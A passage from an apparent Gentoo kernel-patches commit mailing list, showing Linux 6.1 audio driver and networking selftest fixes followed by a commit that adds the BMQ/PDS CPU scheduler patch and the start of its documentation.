++	SND_PCI_QUIRK(0x103c, 0x89d3, "HP EliteBook 645 G9 (MB 89D2)", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8a78, "HP Dev One", ALC285_FIXUP_HP_LIMIT_INT_MIC_BOOST),
+ 	SND_PCI_QUIRK(0x103c, 0x8aa0, "HP ProBook 440 G9 (MB 8A9E)", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8aa3, "HP ProBook 450 G9 (MB 8AA1)", ALC236_FIXUP_HP_GPIO_LED),
+@@ -9433,6 +9434,11 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8ad2, "HP EliteBook 860 16 inch G9 Notebook PC", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b5d, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b5e, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8b7a, "HP", ALC236_FIXUP_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b7d, "HP", ALC236_FIXUP_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b8a, "HP", ALC236_FIXUP_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b8b, "HP", ALC236_FIXUP_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b8d, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b92, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8bf0, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x1043, 0x103e, "ASUS X540SA", ALC256_FIXUP_ASUS_MIC),
+@@ -9480,6 +9486,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1043, 0x1d4e, "ASUS TM420", ALC256_FIXUP_ASUS_HPE),
+ 	SND_PCI_QUIRK(0x1043, 0x1e02, "ASUS UX3402", ALC245_FIXUP_CS35L41_SPI_2),
+ 	SND_PCI_QUIRK(0x1043, 0x1e11, "ASUS Zephyrus G15", ALC289_FIXUP_ASUS_GA502),
++	SND_PCI_QUIRK(0x1043, 0x1e12, "ASUS UM3402", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x1043, 0x1e51, "ASUS Zephyrus M15", ALC294_FIXUP_ASUS_GU502_PINS),
+ 	SND_PCI_QUIRK(0x1043, 0x1e5e, "ASUS ROG Strix G513", ALC294_FIXUP_ASUS_G513_PINS),
+ 	SND_PCI_QUIRK(0x1043, 0x1e8e, "ASUS Zephyrus G15", ALC289_FIXUP_ASUS_GA401),
+@@ -9523,6 +9530,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x144d, 0xc812, "Samsung Notebook Pen S (NT950SBE-X58)", ALC298_FIXUP_SAMSUNG_AMP),
+ 	SND_PCI_QUIRK(0x144d, 0xc830, "Samsung Galaxy Book Ion (NT950XCJ-X716A)", ALC298_FIXUP_SAMSUNG_AMP),
+ 	SND_PCI_QUIRK(0x144d, 0xc832, "Samsung Galaxy Book Flex Alpha (NP730QCJ)", ALC256_FIXUP_SAMSUNG_HEADPHONE_VERY_QUIET),
++	SND_PCI_QUIRK(0x144d, 0xca03, "Samsung Galaxy Book2 Pro 360 (NP930QED)", ALC298_FIXUP_SAMSUNG_AMP),
+ 	SND_PCI_QUIRK(0x1458, 0xfa53, "Gigabyte BXBT-2807", ALC283_FIXUP_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1462, 0xb120, "MSI Cubi MS-B120", ALC283_FIXUP_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1462, 0xb171, "Cubi N 8GL (MS-B171)", ALC283_FIXUP_HEADSET_MIC),
+@@ -9701,6 +9709,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1b7d, 0xa831, "Ordissimo EVE2 ", ALC269VB_FIXUP_ORDISSIMO_EVE2), /* Also known as Malata PC-B1303 */
+ 	SND_PCI_QUIRK(0x1c06, 0x2013, "Lemote A1802", ALC269_FIXUP_LEMOTE_A1802),
+ 	SND_PCI_QUIRK(0x1c06, 0x2015, "Lemote A190X", ALC269_FIXUP_LEMOTE_A190X),
++	SND_PCI_QUIRK(0x1c6c, 0x1251, "Positivo N14KP6-TG", ALC288_FIXUP_DELL1_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1d05, 0x1132, "TongFang PHxTxX1", ALC256_FIXUP_SET_COEF_DEFAULTS),
+ 	SND_PCI_QUIRK(0x1d05, 0x1096, "TongFang GMxMRxx", ALC269_FIXUP_NO_SHUTUP),
+ 	SND_PCI_QUIRK(0x1d05, 0x1100, "TongFang GKxNRxx", ALC269_FIXUP_NO_SHUTUP),
+diff --git a/sound/pci/lx6464es/lx_core.c b/sound/pci/lx6464es/lx_core.c
+index d3f58a3d17fbc..b5b0d43bb8dcd 100644
+--- a/sound/pci/lx6464es/lx_core.c
++++ b/sound/pci/lx6464es/lx_core.c
+@@ -493,12 +493,11 @@ int lx_buffer_ask(struct lx6464es *chip, u32 pipe, int is_capture,
+ 		dev_dbg(chip->card->dev,
+ 			"CMD_08_ASK_BUFFERS: needed %d, freed %d\n",
+ 			    *r_needed, *r_freed);
+-		for (i = 0; i < MAX_STREAM_BUFFER; ++i) {
+-			for (i = 0; i != chip->rmh.stat_len; ++i)
+-				dev_dbg(chip->card->dev,
+-					"  stat[%d]: %x, %x\n", i,
+-					    chip->rmh.stat[i],
+-					    chip->rmh.stat[i] & MASK_DATA_SIZE);
++		for (i = 0; i < MAX_STREAM_BUFFER && i < chip->rmh.stat_len;
++		     ++i) {
++			dev_dbg(chip->card->dev, "  stat[%d]: %x, %x\n", i,
++				chip->rmh.stat[i],
++				chip->rmh.stat[i] & MASK_DATA_SIZE);
+ 		}
+ 	}
+ 
+diff --git a/sound/soc/codecs/tas5805m.c b/sound/soc/codecs/tas5805m.c
+index beb4ec629a03c..4e38eb7acea1b 100644
+--- a/sound/soc/codecs/tas5805m.c
++++ b/sound/soc/codecs/tas5805m.c
+@@ -154,6 +154,7 @@ static const uint32_t tas5805m_volume[] = {
+ #define TAS5805M_VOLUME_MIN	0
+ 
+ struct tas5805m_priv {
++	struct i2c_client		*i2c;
+ 	struct regulator		*pvdd;
+ 	struct gpio_desc		*gpio_pdn_n;
+ 
+@@ -165,6 +166,9 @@ struct tas5805m_priv {
+ 	int				vol[2];
+ 	bool				is_powered;
+ 	bool				is_muted;
++
++	struct work_struct		work;
++	struct mutex			lock;
+ };
+ 
+ static void set_dsp_scale(struct regmap *rm, int offset, int vol)
+@@ -181,13 +185,11 @@ static void set_dsp_scale(struct regmap *rm, int offset, int vol)
+ 	regmap_bulk_write(rm, offset, v, ARRAY_SIZE(v));
+ }
+ 
+-static void tas5805m_refresh(struct snd_soc_component *component)
++static void tas5805m_refresh(struct tas5805m_priv *tas5805m)
+ {
+-	struct tas5805m_priv *tas5805m =
+-		snd_soc_component_get_drvdata(component);
+ 	struct regmap *rm = tas5805m->regmap;
+ 
+-	dev_dbg(component->dev, "refresh: is_muted=%d, vol=%d/%d\n",
++	dev_dbg(&tas5805m->i2c->dev, "refresh: is_muted=%d, vol=%d/%d\n",
+ 		tas5805m->is_muted, tas5805m->vol[0], tas5805m->vol[1]);
+ 
+ 	regmap_write(rm, REG_PAGE, 0x00);
+@@ -201,6 +203,9 @@ static void tas5805m_refresh(struct snd_soc_component *component)
+ 	set_dsp_scale(rm, 0x24, tas5805m->vol[0]);
+ 	set_dsp_scale(rm, 0x28, tas5805m->vol[1]);
+ 
++	regmap_write(rm, REG_PAGE, 0x00);
++	regmap_write(rm, REG_BOOK, 0x00);
++
+ 	/* Set/clear digital soft-mute */
+ 	regmap_write(rm, REG_DEVICE_CTRL_2,
+ 		(tas5805m->is_muted ? DCTRL2_MUTE : 0) |
+@@ -226,8 +231,11 @@ static int tas5805m_vol_get(struct snd_kcontrol *kcontrol,
+ 	struct tas5805m_priv *tas5805m =
+ 		snd_soc_component_get_drvdata(component);
+ 
++	mutex_lock(&tas5805m->lock);
+ 	ucontrol->value.integer.value[0] = tas5805m->vol[0];
+ 	ucontrol->value.integer.value[1] = tas5805m->vol[1];
++	mutex_unlock(&tas5805m->lock);
++
+ 	return 0;
+ }
+ 
+@@ -243,11 +251,13 @@ static int tas5805m_vol_put(struct snd_kcontrol *kcontrol,
+ 		snd_soc_kcontrol_component(kcontrol);
+ 	struct tas5805m_priv *tas5805m =
+ 		snd_soc_component_get_drvdata(component);
++	int ret = 0;
+ 
+ 	if (!(volume_is_valid(ucontrol->value.integer.value[0]) &&
+ 	      volume_is_valid(ucontrol->value.integer.value[1])))
+ 		return -EINVAL;
+ 
++	mutex_lock(&tas5805m->lock);
+ 	if (tas5805m->vol[0] != ucontrol->value.integer.value[0] ||
+ 	    tas5805m->vol[1] != ucontrol->value.integer.value[1]) {
+ 		tas5805m->vol[0] = ucontrol->value.integer.value[0];
+@@ -256,11 +266,12 @@ static int tas5805m_vol_put(struct snd_kcontrol *kcontrol,
+ 			tas5805m->vol[0], tas5805m->vol[1],
+ 			tas5805m->is_powered);
+ 		if (tas5805m->is_powered)
+-			tas5805m_refresh(component);
+-		return 1;
++			tas5805m_refresh(tas5805m);
++		ret = 1;
+ 	}
++	mutex_unlock(&tas5805m->lock);
+ 
+-	return 0;
++	return ret;
+ }
+ 
+ static const struct snd_kcontrol_new tas5805m_snd_controls[] = {
+@@ -294,54 +305,83 @@ static int tas5805m_trigger(struct snd_pcm_substream *substream, int cmd,
+ 	struct snd_soc_component *component = dai->component;
+ 	struct tas5805m_priv *tas5805m =
+ 		snd_soc_component_get_drvdata(component);
+-	struct regmap *rm = tas5805m->regmap;
+-	unsigned int chan, global1, global2;
+ 
+ 	switch (cmd) {
+ 	case SNDRV_PCM_TRIGGER_START:
+ 	case SNDRV_PCM_TRIGGER_RESUME:
+ 	case SNDRV_PCM_TRIGGER_PAUSE_RELEASE:
+-		dev_dbg(component->dev, "DSP startup\n");
+-
+-		/* We mustn't issue any I2C transactions until the I2S
+-		 * clock is stable. Furthermore, we must allow a 5ms
+-		 * delay after the first set of register writes to
+-		 * allow the DSP to boot before configuring it.
+-		 */
+-		usleep_range(5000, 10000);
+-		send_cfg(rm, dsp_cfg_preboot,
+-			ARRAY_SIZE(dsp_cfg_preboot));
+-		usleep_range(5000, 15000);
+-		send_cfg(rm, tas5805m->dsp_cfg_data,
+-			tas5805m->dsp_cfg_len);
+-
+-		tas5805m->is_powered = true;
+-		tas5805m_refresh(component);
++		dev_dbg(component->dev, "clock start\n");
++		schedule_work(&tas5805m->work);
+ 		break;
+ 
+ 	case SNDRV_PCM_TRIGGER_STOP:
+ 	case SNDRV_PCM_TRIGGER_SUSPEND:
+ 	case SNDRV_PCM_TRIGGER_PAUSE_PUSH:
+-		dev_dbg(component->dev, "DSP shutdown\n");
++		break;
+ 
+-		tas5805m->is_powered = false;
++	default:
++		return -EINVAL;
++	}
+ 
+-		regmap_write(rm, REG_PAGE, 0x00);
+-		regmap_write(rm, REG_BOOK, 0x00);
++	return 0;
++}
+ 
+-		regmap_read(rm, REG_CHAN_FAULT, &chan);
+-		regmap_read(rm, REG_GLOBAL_FAULT1, &global1);
+-		regmap_read(rm, REG_GLOBAL_FAULT2, &global2);
++static void do_work(struct work_struct *work)
++{
++	struct tas5805m_priv *tas5805m =
++	       container_of(work, struct tas5805m_priv, work);
++	struct regmap *rm = tas5805m->regmap;
+ 
+-		dev_dbg(component->dev,
+-			"fault regs: CHAN=%02x, GLOBAL1=%02x, GLOBAL2=%02x\n",
+-			chan, global1, global2);
++	dev_dbg(&tas5805m->i2c->dev, "DSP startup\n");
+ 
+-		regmap_write(rm, REG_DEVICE_CTRL_2, DCTRL2_MODE_HIZ);
+-		break;
++	mutex_lock(&tas5805m->lock);
++	/* We mustn't issue any I2C transactions until the I2S
++	 * clock is stable. Furthermore, we must allow a 5ms
++	 * delay after the first set of register writes to
++	 * allow the DSP to boot before configuring it.
++	 */
++	usleep_range(5000, 10000);
++	send_cfg(rm, dsp_cfg_preboot, ARRAY_SIZE(dsp_cfg_preboot));
++	usleep_range(5000, 15000);
++	send_cfg(rm, tas5805m->dsp_cfg_data, tas5805m->dsp_cfg_len);
++
++	tas5805m->is_powered = true;
++	tas5805m_refresh(tas5805m);
++	mutex_unlock(&tas5805m->lock);
++}
+ 
+-	default:
+-		return -EINVAL;
++static int tas5805m_dac_event(struct snd_soc_dapm_widget *w,
++			      struct snd_kcontrol *kcontrol, int event)
++{
++	struct snd_soc_component *component = snd_soc_dapm_to_component(w->dapm);
++	struct tas5805m_priv *tas5805m =
++		snd_soc_component_get_drvdata(component);
++	struct regmap *rm = tas5805m->regmap;
++
++	if (event & SND_SOC_DAPM_PRE_PMD) {
++		unsigned int chan, global1, global2;
++
++		dev_dbg(component->dev, "DSP shutdown\n");
++		cancel_work_sync(&tas5805m->work);
++
++		mutex_lock(&tas5805m->lock);
++		if (tas5805m->is_powered) {
++			tas5805m->is_powered = false;
++
++			regmap_write(rm, REG_PAGE, 0x00);
++			regmap_write(rm, REG_BOOK, 0x00);
++
++			regmap_read(rm, REG_CHAN_FAULT, &chan);
++			regmap_read(rm, REG_GLOBAL_FAULT1, &global1);
++			regmap_read(rm, REG_GLOBAL_FAULT2, &global2);
++
++			dev_dbg(component->dev, "fault regs: CHAN=%02x, "
++				"GLOBAL1=%02x, GLOBAL2=%02x\n",
++				chan, global1, global2);
++
++			regmap_write(rm, REG_DEVICE_CTRL_2, DCTRL2_MODE_HIZ);
++		}
++		mutex_unlock(&tas5805m->lock);
+ 	}
+ 
+ 	return 0;
+@@ -354,7 +394,8 @@ static const struct snd_soc_dapm_route tas5805m_audio_map[] = {
+ 
+ static const struct snd_soc_dapm_widget tas5805m_dapm_widgets[] = {
+ 	SND_SOC_DAPM_AIF_IN("DAC IN", "Playback", 0, SND_SOC_NOPM, 0, 0),
+-	SND_SOC_DAPM_DAC("DAC", NULL, SND_SOC_NOPM, 0, 0),
++	SND_SOC_DAPM_DAC_E("DAC", NULL, SND_SOC_NOPM, 0, 0,
++		tas5805m_dac_event, SND_SOC_DAPM_PRE_PMD),
+ 	SND_SOC_DAPM_OUTPUT("OUT")
+ };
+ 
+@@ -375,11 +416,14 @@ static int tas5805m_mute(struct snd_soc_dai *dai, int mute, int direction)
+ 	struct tas5805m_priv *tas5805m =
+ 		snd_soc_component_get_drvdata(component);
+ 
++	mutex_lock(&tas5805m->lock);
+ 	dev_dbg(component->dev, "set mute=%d (is_powered=%d)\n",
+ 		mute, tas5805m->is_powered);
++
+ 	tas5805m->is_muted = mute;
+ 	if (tas5805m->is_powered)
+-		tas5805m_refresh(component);
++		tas5805m_refresh(tas5805m);
++	mutex_unlock(&tas5805m->lock);
+ 
+ 	return 0;
+ }
+@@ -434,6 +478,7 @@ static int tas5805m_i2c_probe(struct i2c_client *i2c)
+ 	if (!tas5805m)
+ 		return -ENOMEM;
+ 
++	tas5805m->i2c = i2c;
+ 	tas5805m->pvdd = devm_regulator_get(dev, "pvdd");
+ 	if (IS_ERR(tas5805m->pvdd)) {
+ 		dev_err(dev, "failed to get pvdd supply: %ld\n",
+@@ -507,6 +552,9 @@ static int tas5805m_i2c_probe(struct i2c_client *i2c)
+ 	gpiod_set_value(tas5805m->gpio_pdn_n, 1);
+ 	usleep_range(10000, 15000);
+ 
++	INIT_WORK(&tas5805m->work, do_work);
++	mutex_init(&tas5805m->lock);
++
+ 	/* Don't register through devm. We need to be able to unregister
+ 	 * the component prior to deasserting PDN#
+ 	 */
+@@ -527,6 +575,7 @@ static void tas5805m_i2c_remove(struct i2c_client *i2c)
+ 	struct device *dev = &i2c->dev;
+ 	struct tas5805m_priv *tas5805m = dev_get_drvdata(dev);
+ 
++	cancel_work_sync(&tas5805m->work);
+ 	snd_soc_unregister_component(dev);
+ 	gpiod_set_value(tas5805m->gpio_pdn_n, 0);
+ 	usleep_range(10000, 15000);
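
[Editor's sketch] Structurally, the tas5805m rework above does two things: the slow DSP bring-up, with its multi-millisecond usleep_range() settling delays, moves out of the trigger callback into a work item (presumably because trigger can run in a context where sleeping that long is unacceptable), and the shared state (volume, mute, is_powered) is now serialized by a mutex, with cancel_work_sync() ensuring the worker is gone before shutdown touches the hardware. A userspace analogue of that defer-and-lock shape; all names are illustrative, not the driver's API:

#include <pthread.h>
#include <stdbool.h>
#include <stdio.h>
#include <unistd.h>

static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;
static bool is_powered;

static void *do_work(void *arg)		/* schedule_work() target */
{
	(void)arg;
	usleep(5000);			/* let the clock settle; may sleep here */
	pthread_mutex_lock(&lock);
	/* send_cfg(...) and the volume refresh would run here */
	is_powered = true;
	pthread_mutex_unlock(&lock);
	return NULL;
}

static void trigger_start(pthread_t *worker)
{
	pthread_create(worker, NULL, do_work, NULL);	/* defer, never sleep */
}

static void dac_shutdown(pthread_t worker)
{
	pthread_join(worker, NULL);	/* cancel_work_sync() analogue */
	pthread_mutex_lock(&lock);
	if (is_powered) {
		is_powered = false;
		/* read fault registers and force Hi-Z here */
	}
	pthread_mutex_unlock(&lock);
}

int main(void)
{
	pthread_t worker;

	trigger_start(&worker);
	dac_shutdown(worker);
	printf("powered=%d\n", (int)is_powered);
	return 0;
}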
+diff --git a/sound/soc/fsl/fsl_sai.c b/sound/soc/fsl/fsl_sai.c
+index e60c7b3445623..8205b32171495 100644
+--- a/sound/soc/fsl/fsl_sai.c
++++ b/sound/soc/fsl/fsl_sai.c
+@@ -1141,6 +1141,7 @@ static int fsl_sai_check_version(struct device *dev)
+ 
+ 	sai->verid.version = val &
+ 		(FSL_SAI_VERID_MAJOR_MASK | FSL_SAI_VERID_MINOR_MASK);
++	sai->verid.version >>= FSL_SAI_VERID_MINOR_SHIFT;
+ 	sai->verid.feature = val & FSL_SAI_VERID_FEATURE_MASK;
+ 
+ 	ret = regmap_read(sai->regmap, FSL_SAI_PARAM, &val);
+diff --git a/sound/soc/soc-topology.c b/sound/soc/soc-topology.c
+index c3be24b2fac55..a79a2fb260b87 100644
+--- a/sound/soc/soc-topology.c
++++ b/sound/soc/soc-topology.c
+@@ -1401,13 +1401,17 @@ static int soc_tplg_dapm_widget_create(struct soc_tplg *tplg,
+ 
+ 	template.num_kcontrols = le32_to_cpu(w->num_kcontrols);
+ 	kc = devm_kcalloc(tplg->dev, le32_to_cpu(w->num_kcontrols), sizeof(*kc), GFP_KERNEL);
+-	if (!kc)
++	if (!kc) {
++		ret = -ENOMEM;
+ 		goto hdr_err;
++	}
+ 
+ 	kcontrol_type = devm_kcalloc(tplg->dev, le32_to_cpu(w->num_kcontrols), sizeof(unsigned int),
+ 				     GFP_KERNEL);
+-	if (!kcontrol_type)
++	if (!kcontrol_type) {
++		ret = -ENOMEM;
+ 		goto hdr_err;
++	}
+ 
+ 	for (i = 0; i < le32_to_cpu(w->num_kcontrols); i++) {
+ 		control_hdr = (struct snd_soc_tplg_ctl_hdr *)tplg->pos;
+diff --git a/sound/synth/emux/emux_nrpn.c b/sound/synth/emux/emux_nrpn.c
+index 8056422ed7c51..0d6b82ae29558 100644
+--- a/sound/synth/emux/emux_nrpn.c
++++ b/sound/synth/emux/emux_nrpn.c
+@@ -349,6 +349,9 @@ int
+ snd_emux_xg_control(struct snd_emux_port *port, struct snd_midi_channel *chan,
+ 		    int param)
+ {
++	if (param >= ARRAY_SIZE(chan->control))
++		return -EINVAL;
++
+ 	return send_converted_effect(xg_effects, ARRAY_SIZE(xg_effects),
+ 				     port, chan, param,
+ 				     chan->control[param],
+diff --git a/tools/testing/selftests/net/forwarding/lib.sh b/tools/testing/selftests/net/forwarding/lib.sh
+index 3ffb9d6c09504..f4721f1b2886b 100755
+--- a/tools/testing/selftests/net/forwarding/lib.sh
++++ b/tools/testing/selftests/net/forwarding/lib.sh
+@@ -906,14 +906,14 @@ sysctl_set()
+ 	local value=$1; shift
+ 
+ 	SYSCTL_ORIG[$key]=$(sysctl -n $key)
+-	sysctl -qw $key=$value
++	sysctl -qw $key="$value"
+ }
+ 
+ sysctl_restore()
+ {
+ 	local key=$1; shift
+ 
+-	sysctl -qw $key=${SYSCTL_ORIG["$key"]}
++	sysctl -qw $key="${SYSCTL_ORIG[$key]}"
+ }
+ 
+ forwarding_enable()
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_join.sh b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+index 2eeaf4aca644d..76a197f7b8132 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_join.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+@@ -472,6 +472,12 @@ kill_wait()
+ 	wait $1 2>/dev/null
+ }
+ 
++kill_tests_wait()
++{
++	kill -SIGUSR1 $(ip netns pids $ns2) $(ip netns pids $ns1)
++	wait
++}
++
+ pm_nl_set_limits()
+ {
+ 	local ns=$1
+@@ -1688,6 +1694,7 @@ chk_subflow_nr()
+ 	local subflow_nr=$3
+ 	local cnt1
+ 	local cnt2
++	local dump_stats
+ 
+ 	if [ -n "${need_title}" ]; then
+ 		printf "%03u %-36s %s" "${TEST_COUNT}" "${TEST_NAME}" "${msg}"
+@@ -1705,7 +1712,12 @@ chk_subflow_nr()
+ 		echo "[ ok ]"
+ 	fi
+ 
+-	[ "${dump_stats}" = 1 ] && ( ss -N $ns1 -tOni ; ss -N $ns1 -tOni | grep token; ip -n $ns1 mptcp endpoint )
++	if [ "${dump_stats}" = 1 ]; then
++		ss -N $ns1 -tOni
++		ss -N $ns1 -tOni | grep token
++		ip -n $ns1 mptcp endpoint
++		dump_stats
++	fi
+ }
+ 
+ chk_link_usage()
+@@ -2985,7 +2997,7 @@ endpoint_tests()
+ 		pm_nl_set_limits $ns1 2 2
+ 		pm_nl_set_limits $ns2 2 2
+ 		pm_nl_add_endpoint $ns1 10.0.2.1 flags signal
+-		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow &
++		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow 2>/dev/null &
+ 
+ 		wait_mpj $ns1
+ 		pm_nl_check_endpoint 1 "creation" \
+@@ -2998,14 +3010,14 @@ endpoint_tests()
+ 		pm_nl_add_endpoint $ns2 10.0.2.2 flags signal
+ 		pm_nl_check_endpoint 0 "modif is allowed" \
+ 			$ns2 10.0.2.2 id 1 flags signal
+-		wait
++		kill_tests_wait
+ 	fi
+ 
+ 	if reset "delete and re-add"; then
+ 		pm_nl_set_limits $ns1 1 1
+ 		pm_nl_set_limits $ns2 1 1
+ 		pm_nl_add_endpoint $ns2 10.0.2.2 id 2 dev ns2eth2 flags subflow
+-		run_tests $ns1 $ns2 10.0.1.1 4 0 0 slow &
++		run_tests $ns1 $ns2 10.0.1.1 4 0 0 speed_20 2>/dev/null &
+ 
+ 		wait_mpj $ns2
+ 		pm_nl_del_endpoint $ns2 2 10.0.2.2
+@@ -3015,7 +3027,7 @@ endpoint_tests()
+ 		pm_nl_add_endpoint $ns2 10.0.2.2 dev ns2eth2 flags subflow
+ 		wait_mpj $ns2
+ 		chk_subflow_nr "" "after re-add" 2
+-		wait
++		kill_tests_wait
+ 	fi
+ }
+ 
+diff --git a/tools/testing/selftests/net/test_vxlan_vnifiltering.sh b/tools/testing/selftests/net/test_vxlan_vnifiltering.sh
+index 704997ffc2449..8c3ac0a725451 100755
+--- a/tools/testing/selftests/net/test_vxlan_vnifiltering.sh
++++ b/tools/testing/selftests/net/test_vxlan_vnifiltering.sh
+@@ -293,19 +293,11 @@ setup-vm() {
+ 	elif [[ -n $vtype && $vtype == "vnifilterg" ]]; then
+ 	   # Add per vni group config with 'bridge vni' api
+ 	   if [ -n "$group" ]; then
+-	      if [ "$family" == "v4" ]; then
+-		 if [ $mcast -eq 1 ]; then
+-		    bridge -netns hv-$hvid vni add dev $vxlandev vni $tid group $group
+-		 else
+-		    bridge -netns hv-$hvid vni add dev $vxlandev vni $tid remote $group
+-		 fi
+-	      else
+-		 if [ $mcast -eq 1 ]; then
+-		    bridge -netns hv-$hvid vni add dev $vxlandev vni $tid group6 $group
+-		 else
+-		    bridge -netns hv-$hvid vni add dev $vxlandev vni $tid remote6 $group
+-		 fi
+-	      fi
++		if [ $mcast -eq 1 ]; then
++			bridge -netns hv-$hvid vni add dev $vxlandev vni $tid group $group
++		else
++			bridge -netns hv-$hvid vni add dev $vxlandev vni $tid remote $group
++		fi
+ 	   fi
+ 	fi
+ 	done


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-02-13 13:38 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-02-13 13:38 UTC (permalink / raw
  To: gentoo-commits

commit:     72cf91d77d5ed5991c8dab07571fb8c5c54c3c7e
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Mon Feb 13 13:37:39 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Mon Feb 13 13:37:39 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=72cf91d7

Add BMQ patch back, default ALT_SCHED=n

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |     8 +
 ...MQ-and-PDS-io-scheduler-v6.1-r4-linux-tkg.patch | 10154 +++++++++++++++++++
 5021_BMQ-and-PDS-gentoo-defaults.patch             |    13 +
 3 files changed, 10175 insertions(+)

diff --git a/0000_README b/0000_README
index e9f79f14..479e5981 100644
--- a/0000_README
+++ b/0000_README
@@ -134,3 +134,11 @@ Desc:   Add Gentoo Linux support config settings and defaults.
 Patch:  5010_enable-cpu-optimizations-universal.patch
 From:   https://github.com/graysky2/kernel_compiler_patch
 Desc:   Kernel >= 5.15 patch enables gcc = v11.1+ optimizations for additional CPUs.
+
+Patch:  5020_BMQ-and-PDS-io-scheduler-v6.1-r4-linux-tkg.patch
From:   https://github.com/Frogging-Family/linux-tkg https://gitlab.com/alfredchen/projectc
Desc:   BMQ (BitMap Queue) Scheduler. A new CPU scheduler developed from PDS (included). Inspired by the scheduler in Zircon.
+
+Patch:  5021_BMQ-and-PDS-gentoo-defaults.patch
+From:   https://gitweb.gentoo.org/proj/linux-patches.git/
+Desc:   Set defaults for BMQ. Add archs as people test, default to N

diff --git a/5020_BMQ-and-PDS-io-scheduler-v6.1-r4-linux-tkg.patch b/5020_BMQ-and-PDS-io-scheduler-v6.1-r4-linux-tkg.patch
new file mode 100644
index 00000000..7c2a77d3
--- /dev/null
+++ b/5020_BMQ-and-PDS-io-scheduler-v6.1-r4-linux-tkg.patch
@@ -0,0 +1,10154 @@
+diff --git a/Documentation/admin-guide/kernel-parameters.txt b/Documentation/admin-guide/kernel-parameters.txt
+index 42af9ca0127e..31747ec54f9d 100644
+--- a/Documentation/admin-guide/kernel-parameters.txt
++++ b/Documentation/admin-guide/kernel-parameters.txt
+@@ -5406,6 +5406,12 @@
+ 	sa1100ir	[NET]
+ 			See drivers/net/irda/sa1100_ir.c.
+ 
++	sched_timeslice=
++			[KNL] Time slice in ms for Project C BMQ/PDS scheduler.
++			Format: integer 2, 4
++			Default: 4
++			See Documentation/scheduler/sched-BMQ.txt
++
+ 	sched_verbose	[KNL] Enables verbose scheduler debug messages.
+ 
+ 	schedstats=	[KNL,X86] Enable or disable scheduled statistics.
+diff --git a/Documentation/admin-guide/sysctl/kernel.rst b/Documentation/admin-guide/sysctl/kernel.rst
+index 98d1b198b2b4..d7c78a107f93 100644
+--- a/Documentation/admin-guide/sysctl/kernel.rst
++++ b/Documentation/admin-guide/sysctl/kernel.rst
+@@ -1552,3 +1552,13 @@ is 10 seconds.
+ 
+ The softlockup threshold is (``2 * watchdog_thresh``). Setting this
+ tunable to zero will disable lockup detection altogether.
++
++yield_type:
++===========
++
++BMQ/PDS CPU scheduler only. This determines what type of yield calls
++to sched_yield will perform.
++
++  0 - No yield.
++  1 - Deboost and requeue task. (default)
++  2 - Set run queue skip task.
+diff --git a/Documentation/scheduler/sched-BMQ.txt b/Documentation/scheduler/sched-BMQ.txt
+new file mode 100644
+index 000000000000..05c84eec0f31
+--- /dev/null
++++ b/Documentation/scheduler/sched-BMQ.txt
+@@ -0,0 +1,110 @@
++                         BitMap queue CPU Scheduler
++                         --------------------------
++
++CONTENT
++========
++
++ Background
++ Design
++   Overview
++   Task policy
++   Priority management
++   BitMap Queue
++   CPU Assignment and Migration
++
++
++Background
++==========
++
++BitMap Queue CPU scheduler, referred to as BMQ from here on, is an evolution
++of the previous Priority and Deadline based Skiplist multiple queue scheduler
++(PDS), and inspired by the Zircon scheduler. Its goal is to keep the scheduler
++code simple, while staying efficient and scalable for interactive tasks such
++as desktop use, movie playback and gaming.
++
++Design
++======
++
++Overview
++--------
++
++BMQ uses a per-CPU run queue design: each (logical) CPU has its own run
++queue, and each CPU is responsible for scheduling the tasks that are put
++into its run queue.
++
++The run queue is a set of priority queues. In terms of data structure these
++queues are FIFO queues for non-rt tasks and priority queues for rt tasks;
++see BitMap Queue below for details. BMQ is optimized for non-rt tasks, given
++that most applications are non-rt tasks. Whether a queue is FIFO or priority,
++each queue is an ordered list of runnable tasks awaiting execution, and the
++data structures are the same. When it is time for a new task to run, the
++scheduler simply looks at the lowest numbered queue that contains a task and
